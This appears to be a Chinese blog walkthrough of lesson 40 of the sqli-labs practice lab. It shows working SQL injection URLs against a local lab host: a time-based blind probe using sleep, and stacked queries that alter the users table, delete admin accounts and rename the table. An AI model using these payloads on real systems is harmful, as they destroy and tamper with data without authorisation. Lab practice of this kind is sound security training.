首页 > itarticle > sqli

sqli

admin 11月 13, 2020 0

分析

这一课只是是盲注的堆叠注入,并且闭合方式为')

http://192.168.75.132/sql/Less-40/?id=1') and if(1,sleep(10),null)%23

001

在password字段后添加status字段

http://192.168.75.132/sql/Less-40/?id=1');ALTER TABLE `security`.`users`
ADD COLUMN `status` tinyint(1) NOT NULL AFTER `password`;%23

002

003

删除以admin开头的用户。

http://192.168.75.132/sql/Less-40/?id=1');DELETE from users where username like 'admin%';%23

004

http://192.168.75.132/sql/Less-40/?id=1');alter TABLE users rename to newusrs;%23

005

006

微海报分享

近期文章

近期评论

标签

热门

文章归档

分类目录

功能